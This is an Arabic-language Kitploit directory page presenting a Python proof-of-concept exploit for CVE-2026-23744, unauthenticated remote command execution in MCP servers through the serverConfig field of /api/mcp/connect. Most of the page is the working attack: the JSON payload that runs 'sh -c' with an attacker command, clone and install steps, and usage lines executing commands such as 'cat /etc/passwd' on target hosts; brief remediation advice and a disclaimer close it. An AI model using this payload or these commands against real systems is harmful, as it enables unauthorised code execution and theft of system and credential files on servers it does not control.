Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23744-POC — # Python PoC لـ CVE-2026-23744، تنفيذ أوامر عن بُعد غير مصادق عليه في خوادم MCP عبر حقل الأمر serverConfig في /api/mcp/connect (المنفذ الافتراضي 6274) | Kitploit
أدوات/GitHubGitHub/d3vn0mi/cve-2026-23744-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubd3vn0mi/cve-2026-23744-poc

CVE-2026-23744-POC

# Python PoC لـ CVE-2026-23744، تنفيذ أوامر عن بُعد غير مصادق عليه في خوادم MCP عبر حقل الأمر serverConfig في /api/mcp/connect (المنفذ الافتراضي 6274)

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23744 — تنفيذ أوامر عن بُعد غير مصادق عليه في خوادم MCP

إثبات المفهوم (PoC) من إعداد d3vn0mi

نظرة عامة

CVE-2026-23744 هو ثغرة تنفيذ أوامر عن بُعد (RCE) غير مصادق عليها في الخوادم المتوافقة مع MCP والمعرّضة على المنفذ 6274. يقبل نقطة النهاية /api/mcp/connect كائن serverConfig يسمح للمتصلين بتحديد أمر نظام تشغيل ووسائطه بشكل تعسفي — دون أي فحوصات مصادقة أو تفويض.

يمكن للمهاجم الذي لديه وصول شبكي إلى الخدمة تنفيذ أوامر تعسفية بصلاحيات المستخدم الذي يشغّل خادم MCP.

التفاصيلالقيمة
معرف CVECVE-2026-23744
النوعتنفيذ أوامر عن بُعد غير مصادق عليه
نقطة النهايةPOST /api/mcp/connect
المنفذ6274 (الافتراضي)
الخطورةحرجة

الحمولة القابلة للاستغلال

root@kitploit:~
{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_COMMAND>"],
    "env": {}
  },
  "serverId": "anything"
}

يقوم الخادم بتشغيل command المقدَّم مع args المعطاة دون أي تنقية أو ضوابط وصول.

التثبيت

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt

الاستخدام

root@kitploit:~
# الاستخدام الأساسي
python3 exploit.py -t <TARGET_IP> -c '<COMMAND>'

# منفذ مخصص
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'

# تخطي فحص إمكانية الوصول
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check

# معرف خادم مخصص
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server

الخيارات

العلمالوصف
-t, --targetعنوان IP أو اسم المضيف المستهدف (مطلوب)
-c, --commandأمر نظام التشغيل للتنفيذ (مطلوب)
-p, --portمنفذ الهدف (الافتراضي: 6274)
-s, --server-idقيمة serverId في الحمولة
--timeoutمهلة الفحص بالثواني (الافتراضي: 30)
--no-checkتخطي فحص إمكانية الوصول الأولي

المعالجة

  • لا تقم بتعريض خادم MCP لشبكات غير موثوقة.
  • طبّق تصحيحات البائع فور توفرها.
  • قيّد الوصول إلى نقطة النهاية /api/mcp/connect عبر المصادقة وضوابط مستوى الشبكة.
  • راقب عمليات التشغيل غير المتوقعة الناتجة عن عملية خادم MCP.

إخلاء المسؤولية

هذه الأداة مقدَّمة لأغراض الاختبار الأمني المصرّح به والتعليم فقط. الوصول غير المصرّح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام. احصل دائمًا على التفويض المناسب قبل الاختبار.

الترخيص

هذا المشروع مرخّص بموجب رخصة MIT.

المؤلف

d3vn0mi — github.com/d3vn0mi

تنزيل الأداة